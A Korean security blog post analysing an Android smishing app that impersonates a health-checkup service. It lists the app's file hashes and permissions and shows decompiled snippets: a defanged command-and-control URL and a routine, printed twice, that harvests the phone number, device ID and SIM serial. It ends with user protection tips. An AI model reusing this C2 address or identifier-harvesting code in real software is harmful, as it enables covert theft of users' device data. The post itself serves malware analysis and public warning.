오늘은 건강검진 사칭 스미싱 안드로이드 악성코드 검진모아(2020.11.27)에 대해 글을 적어보겠습니다. 일단 해당 악성코드는 건강검진들 사칭하는 문자를 무작위로 보내서 사용자가 해당 앱 에서 파일을 다운로드 하고 설치하고 실행을 하면 동작을 하는 스마트폰 안드로이드 악성코드입니다.
MD5:25b7b8fe341170fd812bd6a4e031d7d6
SHA-1:2f31f9b8ac3f77af99b1b823172b768915002668
SHA-256:2f50e306d8cf2674d7b7ff304c29e8636fa24d6099ee86eb297aa7477bb71522
일단 해당 악성코드의 권한은 다음과 같습니다.
android.permission.INTERNET
android.permission.READ_PHONE_STATE
android.permission.READ_SMS
android.permission.SEND_SMS
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.RECEIVE_SMS
검진 모아 악성코드 안드로이드 권한
검진모아 악성코드 권한검진모아 악성코드 권한그리고 악성코드에 포함된 IP 주소를 조회하면 다음과 같은 결과를 얻을 수가 있습니다.
public class HttpUtils {
public static String URL = "h??p://45(.)134.81.90:3030/";
public static String getHttpURL(Context context) {
String server_url = context.getSharedPreferences("pref", 0).getString("Server_URL", "");
if (server_url == "") {
return URL;
}
return server_url;
}
com.justice.sand.HttpUtils
기본적으로 악성코드는 com.justice.sand.MainActivity를 통해서 작동합니다.
그리고 전화번호를 얻거나 GPS 를 끄고 켜는 코드들도 있는 것을 확인할 수가 있습니다.일단 먼저 ICCD 정보를 훔치기 위한 코드 부부입니다.
public String getPhoneNumber() {
TelephonyManager tm = (TelephonyManager) this.context.getSystemService("phone");
String phoneNumber = tm.getLine1Number();
if (phoneNumber == null || phoneNumber.equals("")) {
String SimserialNum = tm.getSimSerialNumber();
String DeviceID = tm.getDeviceId();
String identifier = null;
if (SimserialNum != null && DeviceID != null) {
identifier = String.valueOf(DeviceID.toUpperCase()) + "-" + SimserialNum.toUpperCase();
} else if (DeviceID != null) {
identifier = DeviceID.toUpperCase();
}
return identifier;
} else if (phoneNumber.charAt(0) == '+') {
return phoneNumber.substring(1);
} else {
return phoneNumber;
}
}
검진모아 악성코드 데이터 수집
여기서 이야기 하는 ICCD 이라는것은 SIM 카드는 각자의 고유한 번호가 있다. 고정된 번호인 ICCID(SIM 카드 외부에 기록된 89로 시작하는 19자리 숫자) 입니다.일단 해당 코드를 통해서 유심의 ICCD 정보를 훔쳐 갑니다.
그리고 나서 스마트폰의 전화번호를 훔치는 코드도 다음과 같이 삽입이 되어져 있습니다. public String getPhoneNumber() {
TelephonyManager tm = (TelephonyManager) this.context.getSystemService("phone");
String phoneNumber = tm.getLine1Number();
if (phoneNumber == null || phoneNumber.equals("")) {
String SimserialNum = tm.getSimSerialNumber();
String DeviceID = tm.getDeviceId();
String identifier = null;
if (SimserialNum != null && DeviceID != null) {
identifier = String.valueOf(DeviceID.toUpperCase()) + "-" + SimserialNum.toUpperCase();
} else if (DeviceID != null) {
identifier = DeviceID.toUpperCase();
}
return identifier;
} else if (phoneNumber.charAt(0) == '+') {
return phoneNumber.substring(1);
} else {
return phoneNumber;
}
}
검진모아 악성코드 전호 번호 수집
com.justice.sand.Tools
그리고 악성코드에 포함된 IP 주소를 조회하면 다음과 같은 결과를 얻을 수가 있습니다.
악성코드 주소악성코드 주소
45.134(.)81.90
90.81(.)134.45.in-addr.arpa: SERVFAIL
Hostname:45(.)134.81.90
Location For an IP:45(.)134.81.90
Continent:Asia (AS)
Country:Hong Kong
IP Location:Find In Hong Kong (HK)
Capital:Hong Kong
이번에는 오래간만에 홍콩으로 복귀를 한것 같습니다.아무튼 홍콩으로 되어져 있는것을 확인을 할수가 있습니다.
검진모아 사칭 악성코드 IP 주소검진모아 사칭 악성코드 IP 주소
구글 안드로이드 스마트폰 삼성 갤럭시, LG 등은 기본적으로 공식 스토어에서 이외에서 설치하면 기본적으로 경고합니다. 일단 안드로이드 6.0 기준으로 외부에서 설치를 시도하면 다음과 같음 메시지를 볼 수가 있습니다.
설치가 차단됨
보안을 위해 알 수 없는 출처에서 구매한 앱은 휴대전화에 설치되지 않도록 설정되어 있습니다.
라는 경고문을 볼 수가 있는데 제발! 이런 경고문 뜨면 설치를 하지 않는 것이 제일 안전 합니다. 기본적으로 안드로이드 스마트폰에서 설정->보안(갤럭시 S5 기준,어차피 안드로이드 스마트폰 설정은 비슷 합니다.)출러를 알 수 없는 앱 부분을 활성화해 두었다고 하면 해당 기능을 해제시켜서 사용하시길 바랍니다. 그리고 백신 프로그램, 백신앱 사용시 전 세계적으로 공신력 있는 백신앱을 사용을 하시길 바랍니다. 비록 무료 버전은 있다고 해도 광고가 있겠지만, 유료 결제하더라고 1만 원~4만 원 사이 가격을 내고 자신의 개인정보 돈을 지키는 데에서는 개인적으로 아깝지 않다고 생각을 합니다.
그리고 기본적으로 후후, 후스콜 같은 전화금융사기 전화 차단 어플을 통해서도 도움을 받을 수가 있으니까 이런 앱들은 기본적으로 설치하고 실행을 해주는 것도 도움이 될 것입니다. 다만, 실행을 하고 일부 기능을 사용하려면 사용자가 직접 설정에서 해당 앱 권한을 허용을 헤야기 때문에 해당 설정 부분도 변경하시는 것도 추천합니다. 이상 오늘은 검진모아을 사칭하는 보이스피싱앱 에 대해 글을 적어 보았습니다. 그리고 문자 메시지로 단축 주소가 오는 것은 문자는 무시하시면 됩니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
삼성 갤럭시 2020 년 12 월 업데이트에서 중요한 Android 버그 수정 (0) | 2020.12.14 |
---|---|
Good Bye~Adobe Flash Player 마직막 보안 업데이트 (0) | 2020.12.11 |
윈도우 10 KB4592438 보안 업데이트 (0) | 2020.12.10 |
윈도우 10 KB4586853 선택적 품질 업데이트 (4) | 2020.12.02 |
건강검진 사칭 스미싱 안드로이드 악성코드-검진모아(2020.11.23) (4) | 2020.11.25 |
구글 크롬 Windows 7에 대한 구글 크롬 지원 2022년1월15일까지 연장 (2) | 2020.11.23 |
모질라 파이어폭스 83.0 (Firefox 83.0)보안 업데이트 (2) | 2020.11.20 |
암호화폐 거래소 고팍스(GOPAX)를 사칭하는 피싱 사이트-gopaxo(2020.11.17) (0) | 2020.11.19 |